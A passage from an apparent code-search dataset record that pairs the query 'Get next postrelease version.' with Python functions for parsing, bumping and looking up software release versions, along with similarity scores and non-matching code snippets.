version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def bump_micro(self: _R, inc: int = 1) -> _R:\n if not self.is_stable:\n return self.get_stable().bump_micro(inc - 1)\n\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro + inc),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def is_release():\n return VERSION[-1]", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def compute_version_for_latest(project_name, org_name, repo_name, distro_name):\n #TODO: update for h turtle\n assert distro_name in ['fuerte', 'groovy']\n if distro_name == 'fuerte':\n release = 'lucid'\n else:\n release = 'precise'\n project_name = project_name.replace('_', '-')\n prefix = 'debian/ros-%s-%s_'%(distro_name, project_name)\n suffix = '_%s'%(release)\n tags = list_tags(org_name, repo_name, prefix)\n tags = [t[:-len(suffix)] for t in tags if t.endswith(suffix)]\n if not tags:\n return None\n print(\"TAGS\", [t[len(prefix):] for t in tags])\n \n versions = sorted([distutils.version.LooseVersion(t[len(prefix):]) for t in tags])\n if not versions:\n return None\n version = versions[-1].vstring #for pattern\n return '%s%s%s'%(prefix, version, suffix)", "def get_version_string():\n major, minor, micro, patch, tag, relnum, is_release = VERSION\n\n version = '%s.%s' % (major, minor)\n\n if micro or patch:\n version += '.%s' % micro\n\n if patch:\n version += '.%s' % patch\n\n if tag != 'final':\n if tag == 'rc':\n version += ' RC'\n else:\n version += ' %s ' % tag\n\n version += '%s' % relnum\n\n if not is_release:\n version += ' (dev)'\n\n return version", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def get_current_release():\n return _CURRENT_RELEASE", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def get_min_build_version(version: str) -> str:\n return Version(version).replace(micro=0).get_stable().dumps()", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_version():\n return '%d.%d.%d' % version_info", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def bump(self, *, rc: int = 0) -> str:\n try:\n current = Version(self.pkg_version)\n assert isinstance(current, Version)\n # bump the version\n self.pkg_version = str(bump_version(post_bump=True, current=current, rc=rc))\n except Exception as e: # pragma: no cover\n log.error(f\"Error: {e}\")\n return self.pkg_version", "def __getattr__(self, name):\n if name in ('epoch', 'release', 'pre', ):\n return getattr(self._version, name)\n if name in ('post', 'dev'):\n attr = getattr(self._version, name)\n return attr[1] if attr else None\n if name == 'is_devrelease':\n return self.dev is not None\n\n parts = ('major', 'minor', 'micro')\n try:\n index = parts.index(name)\n except ValueError:\n raise AttributeError('{!r} object has to attribute {!r}'\n .format(type(self).__name__, name)) from None\n release = self.release\n return release[index] if len(release) >= index + 1 else 0", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def commcare_minor_release(self):\n return '%d.%d' % self.build_spec.minor_release()", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_version(version=VERSION, date=DATE):\n return \"JoMRS v{} Modular Rigging System | last update {}\".format(\n \".\".join([i for i in version]), \"/\".join([x for x in date])\n )", "def bump_postrelease(self: _R, inc: int = 1) -> _R:\n post = (VersionParts.POST, max(inc, 1))\n base_post: Optional[Tuple[str, int]] = self._version.post\n if base_post:\n post = (VersionParts.POST, max(base_post[1], 1) + inc)\n base = BaseVersion(\n epoch=0,\n release=self._version.release,\n pre=None,\n post=post,\n dev=None,\n local=None,\n )\n return self._replace(base)", "def bump_tag(\n tag: Optional[semantic_version.Version],\n change_type: int) -> semantic_version.Version:\n if tag is None:\n return semantic_version.Version('0.0.1')\n\n if change_type == constants.MAJOR:\n return tag.next_major()\n\n if change_type == constants.MINOR:\n return tag.next_minor()\n\n return tag.next_patch()", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def get_build_version():\n package_version = __version__\n tags = (\n subprocess.run(\n [\"/usr/bin/git\", \"tag\", \"--points-at\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n .split(\"\\n\")\n )\n commit_id = (\n subprocess.run(\n [\"/usr/bin/git\", \"rev-parse\", \"--short\", \"HEAD\"],\n cwd=os.path.dirname(os.path.realpath(__file__)),\n stdout=subprocess.PIPE,\n check=True,\n )\n .stdout.decode(\"utf-8\")\n .strip(\"\\n\")\n )\n\n version_tags = _select_version_tags(tags)\n if len(version_tags) > 1:\n raise exc.QgrVersionError(\n f\"Can not determine desired version from tags: {tags}\",\n )\n\n if len(version_tags) == 1:\n version = version_tags[0]\n else:\n # If there is no version tag, build a unique version string\n version = f\"{package_version}-{commit_id}\"\n\n return version", "def get_version():\n click.echo(get_current_version_number())", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def get_version():\n return 1", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def bump_release(\n self: _R,\n release_type: Literal[\"major\", \"minor\", \"micro\"] = VersionParts.MICRO,\n inc: int = 1,\n ) -> _R:\n if release_type == VersionParts.MAJOR:\n return self.bump_major(inc)\n if release_type == VersionParts.MINOR:\n return self.bump_minor(inc)\n\n return self.bump_micro(inc)", "def get_package_version():\n major, minor, micro, patch, tag, relnum = __version_info__\n\n version = '%s.%s' % (major, minor)\n\n if micro or patch:\n version += '.%s' % micro\n\n if patch:\n version += '.%s' % patch\n\n if tag != 'final':\n version += '%s%s' % (\n {\n 'alpha': 'a',\n 'beta': 'b',\n }.get(tag, tag),\n relnum)\n\n return version", "def main(args: argparse.Namespace) -> None:\n if args.is_rc and args.is_dev:\n raise ValueError(\"A release version cannot be both RC and dev.\")\n if args.is_rc:\n assert args.rc is not None, \"rc field must be specified if is_rc is specified\"\n assert args.rc >= 1, \"RC version must start from 1.\"\n else:\n assert args.rc is None, \"is_rc must be specified in order to specify rc field\"\n update_cmake(args.major, args.minor, args.patch)\n update_pypkg(\n args.major,\n args.minor,\n args.patch,\n is_rc=args.is_rc,\n is_dev=args.is_dev,\n rc_ver=args.rc,\n )", "def increment_milestone_version(old_version, release_type):\n if release_type == \"milestone\":\n if \"b\" in old_version[-1]:\n # Not the first milestone\n new_version_parts = old_version[:-1]\n next_milestone = int(old_version[-1][2:]) + 1\n new_version_parts.append(\"0b{}\".format(next_milestone))\n else:\n new_version_parts = increment_version(old_version, (1, 0, 0))\n new_version_parts.append(\"0b1\")\n elif release_type == \"rc\":\n new_version_parts = old_version[:-1]\n if \"b\" in old_version[-1]:\n # First RC\n new_version_parts.append(\"0rc1\")\n else:\n next_rc = int(old_version[-1][3:]) + 1\n new_version_parts.append(\"0rc{}\".format(next_rc))\n else:\n raise ValueError(\"Unknown release type {!r}\".format(release_type))\n return new_version_parts", "def version_max():\n return VERSION_MAX", "def get_new_build(old_version, new_version, build):\n\n # Version did not change, increment the current build number\n if old_version == new_version:\n return str(int(build) + 1)\n\n # Version changed, start over at 1\n else:\n return str(1)", "def get_latest_tf_version(include_prerelease: bool = False) -> str:\n return get_available_tf_versions(include_prerelease)[0]", "def get_version():\n git_root = find_git_root(dirname(__file__))\n\n if git_root is not None:\n # Get the version using \"git describe\".\n cmd = \"git describe --tags --match [0-9]*\".split()\n try:\n version = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get version number from git tags\")\n exit(1)\n\n # PEP 386 compatibility\n if \"-\" in version:\n version = \".post\".join(version.split(\"-\")[:2])\n\n # Don't declare a version \"dirty\" merely because a time stamp has\n # changed. If it is dirty, append a \".dev1\" suffix to indicate a\n # development revision after the release.\n with open(os.devnull, \"w\") as fd_devnull:\n subprocess.call([\"git\", \"status\"], stdout=fd_devnull, stderr=fd_devnull)\n\n cmd = \"git diff-index --name-only HEAD\".split()\n try:\n dirty = subprocess.check_output(cmd).decode().strip()\n except subprocess.CalledProcessError:\n logger.exception(\"Unable to get git index status\")\n exit(1)\n\n if dirty != \"\":\n version += \".dev1\"\n\n return version\n\n else:\n try:\n return pkg_resources.working_set.by_key[\"graphql-validate\"].version\n except KeyError:\n return \"0.0.0-unreleased\"", "def bump_minor(self: _R, inc: int = 1) -> _R:\n if not self.is_stable and self.micro == 0:\n return self.get_stable().bump_minor(inc - 1)\n\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor + inc, 0),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def get_version(cls) -> str:\n if not cls.is_available():\n return 'None'\n else:\n import pkg_resources\n try:\n return pkg_resources.get_distribution('ncnn').version\n except Exception:\n return 'None'", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def version_min():\n return VERSION_MIN", "def latest_version(self) -> AwesomeVersion | None:\n return self.sys_updater.version_cli", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def main(self):\n logging.info(\"Doing release for %s\", self.version.raw)\n\n if self.version.branch is None:\n logging.debug(\"No branch, assuming '%s'. Override with --branch.\",\n self.options.branch)\n self.version.branch = self.options.branch\n\n # No version specified, assuming a snapshot release\n if self.options.version is None:\n self.do_release(\n version=MwVersion.new_snapshot(self.options.branch))\n return 0\n\n if self.options.previousversion:\n # Given the previous version on the command line\n self.do_release(version=self.version)\n return 0\n\n no_previous = False\n if self.version.prev_version is None:\n no_previous = True\n if not self.ask(\"No previous release found. Do you want to make a \"\n \"release with no patch?\"):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n if no_previous or self.options.no_previous:\n self.do_release(version=self.version)\n else:\n if not self.ask(\"Was %s the previous release?\" %\n self.version.prev_version):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n\n self.do_release(version=self.version)\n return 0", "def get_version_for(self,platform,version):\n def supports_platform(test_platforms):\n if test_platforms.upper() in ['ALL','ANY']:\n platforms = PLATFORMS\n else:\n platforms = test_platforms.split(':')\n return platform in platforms\n\n # Minimal required version check (for mainline releases)\n if self.min_versions:\n base_version = '.'.join(version.split('.')[:2])\n for base_min_version, min_version in (('.'.join(x.split('.')[:2]),x)\n for x in self.min_versions.split(';')):\n if compare_versions(base_version,base_min_version) == 0:\n if compare_versions(version,min_version) < 0:\n return None\n # Find the suitable test version\n candidate = '0'\n test = None\n for t in (t for t in self.versions if supports_platform(t.platform)):\n if compare_versions(version,t.firebird_version) >= 0:\n if compare_versions(candidate,t.firebird_version) < 0:\n candidate = t.firebird_version\n test = t\n return test", "def getVersion():\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version", "def version(self, version: Optional[str]) -> Optional[ChartVersionInfo]:\n if version is None or version == \"\":\n return self.latest\n\n versionspec = semantic_version.SimpleSpec(version)\n\n for r in self.versions:\n if versionspec.match(r.version_info):\n return r\n return None", "def next_version(file_):\n split_file = file_.rsplit(\"_\", 1)\n name_file = split_file[0]\n version = split_file[-1]\n padding = len(version)\n\n if version.isdigit():\n next_version = int(version) + 1\n next_version = str(next_version).zfill(padding)\n\n return concat(name_file, next_version, separator=\"_\")\n else:\n e = concat(file_, \" is incorrect.\")\n raise ValueError(e)", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def get_version():\n return '.'.join(map(str, VERSION))", "def semver_from(changelog: Path) -> Version:\n with open(changelog) as f:\n matches = SEMVER_RE.finditer(f.read())\n versions: List[Version] = []\n is_unreleased = False\n for match in matches:\n version = match.groupdict()[\"version\"]\n if version.lower() == \"unreleased\":\n is_unreleased = True\n else:\n versions.append(Version.parse(version))\n\n versions.sort()\n latest = versions[-1]\n print(latest)\n return latest.bump_prerelease() if is_unreleased else latest", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def get_major_version(version):\n return str(check_version(version)[0])", "def patch_version(self) -> Optional[PatchVersion]:\n\n # for PBE: version is always \"main\"\n if self.solution.storage.url == RadsStorage.URL_PBE:\n return PatchVersion(\"main\")\n\n cache = self.solution.storage.fspath(f\"{self.path}/_patch_version\")\n if os.path.isfile(cache):\n logger.debug(f\"retrieving patch version for {self} from cache\")\n with open(cache) as f:\n version = f.read().strip()\n version = PatchVersion(version) if version else None\n else:\n version = self._retrieve_patch_version()\n if version is None:\n logger.warning(f\"failed to retrieve patch version for {self}\")\n else:\n with open(cache, 'w') as f:\n f.write(f\"{version}\\n\")\n return version", "def get_version():\n version = pkg_resources.require(\"sacredboard\")[0].version\n return version", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_version(self, name: str, version=None) -> int:\n division, is_vertebrate = self.get_division(name)\n if version is None:\n latest_version = self.get_release(is_vertebrate)\n return latest_version\n\n if not str(version).isdecimal():\n raise TypeError(\"Version must be a number\")\n version = int(version)\n\n all_versions = self.get_releases(is_vertebrate)\n ensembl = f\"Ensembl{'' if is_vertebrate else 'Genomes'}\"\n if version not in all_versions:\n raise ValueError(\n f\"{ensembl} release version {version} \"\n f\"not found. Available versions: {all_versions}\"\n )\n\n releases = self.releases_with_assembly(name)\n if version not in releases:\n raise FileNotFoundError(\n f\"{name} not found on {ensembl} release {version}. \"\n f\"Available on release versions: {releases}\"\n )\n return version", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def get_version():\n return \".\".join([str(i) for i in config[\"version\"]])", "def make_version_number(branch_name, build_number, tag, sha):\n branch_name_sanitized = sanitize_branch_name(branch_name)\n build_info = ['sha', sha, 'build', str(build_number), 'branch', branch_name_sanitized]\n prerelease = []\n if tag is not None:\n version = tag_to_version(tag)\n elif branch_name.startswith('release/') or branch_name.startswith('hotfix/'):\n version = tag_to_version(branch_name.split('/', 1)[1])\n prerelease = [str(build_number)]\n else:\n version = '0.0.0'\n prerelease = [str(build_number)]\n semver = semantic_version.Version(version)\n semver.prerelease = prerelease\n semver.build = build_info\n\n return semver", "def get_release_version():\n try:\n zipfile = glob.glob('adodb-*.zip')[0]\n except IndexError:\n print(\"ERROR: release zip file not found in '{}'\".format(release_path))\n sys.exit(1)\n\n try:\n version = re.search(\n r\"^adodb-([\\d]+\\.[\\d]+\\.[\\d]+)(-(alpha|beta|rc)\\.[\\d]+)?\\.zip$\",\n zipfile\n ).group(1)\n except AttributeError:\n print('''ERROR: unable to extract version number from '{}'\n Only 3 groups of digits separated by periods are allowed'''\n .format(zipfile))\n sys.exit(1)\n\n return version", "def make_semver(repo_root, build_number):\n branch_name, sha, tags = parse_describe(repo_root)\n if tags:\n # There are git tags to consider. Parse them all then choose the one that is latest (sorted by semver rules)\n return sorted([make_version_number(branch_name, build_number, tag, sha) for tag in tags])[-1]\n else:\n return make_version_number(branch_name, build_number, None, sha)", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def full_version(self) -> Optional[str]:\n full_version = None\n if self.version:\n full_version = self.version\n if self.release:\n full_version = \"{}-{}\".format(self.version, self.release)\n return full_version", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")" ]
[ "0.74618196", "0.73501813", "0.72785693", "0.6688966", "0.6573726", "0.6516371", "0.63295984", "0.632609", "0.61778533", "0.60363823", "0.60113215", "0.60052055", "0.59608686", "0.59551674", "0.594888", "0.5904299", "0.5897116", "0.5894186", "0.5864545", "0.58246434", "0.5817243", "0.5791231", "0.5765547", "0.57615733", "0.5755393", "0.5754202", "0.57332367", "0.5692867", "0.5688805", "0.5686454", "0.56781626", "0.5667542", "0.5663731", "0.5655082", "0.5612569", "0.56092936", "0.55995554", "0.5589893", "0.5568282", "0.55502385", "0.5549583", "0.55361277", "0.55353004", "0.5532048", "0.5522137", "0.55037934", "0.54915917", "0.54909885", "0.548253", "0.54819614", "0.54811734", "0.54712665", "0.5450533", "0.5440432", "0.5429597", "0.53926563", "0.5392306", "0.5391978", "0.5385671", "0.5377122", "0.53641266", "0.53627", "0.5349291", "0.5349026", "0.5339433", "0.53392726", "0.5332265", "0.5321469", "0.53175646", "0.53137815", "0.53048044", "0.52872324", "0.5268295", "0.52659875", "0.5261702", "0.5252461", "0.5252245", "0.52504784", "0.5223913", "0.52151406", "0.5212988", "0.5205764", "0.51982105", "0.5189427", "0.5184216", "0.51791716", "0.5177716", "0.51775324", "0.51650673", "0.5153049", "0.51472425", "0.51443434", "0.5137492", "0.5135685", "0.51265013", "0.5117633", "0.5117633", "0.5117633", "0.5117633", "0.5117633" ]
0.6240163
8
Get next postrelease version.
def bump_postrelease(self: _R, inc: int = 1) -> _R: post = (VersionParts.POST, max(inc, 1)) base_post: Optional[Tuple[str, int]] = self._version.post if base_post: post = (VersionParts.POST, max(base_post[1], 1) + inc) base = BaseVersion( epoch=0, release=self._version.release, pre=None, post=post, dev=None, local=None, ) return self._replace(base)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_current_release():\n return _CURRENT_RELEASE", "def is_release():\n return VERSION[-1]", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def get_last_release_id():\n url = \"https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest\"\n try:\n with urlopen(url, timeout=10) as resp:\n return json.loads(resp.read().decode(\"utf-8\")).get(\"tag_name\", \"0\")\n except URLError as e:\n log(f\"YouTubeDLHelper error [get last release id]: {e}\")", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == 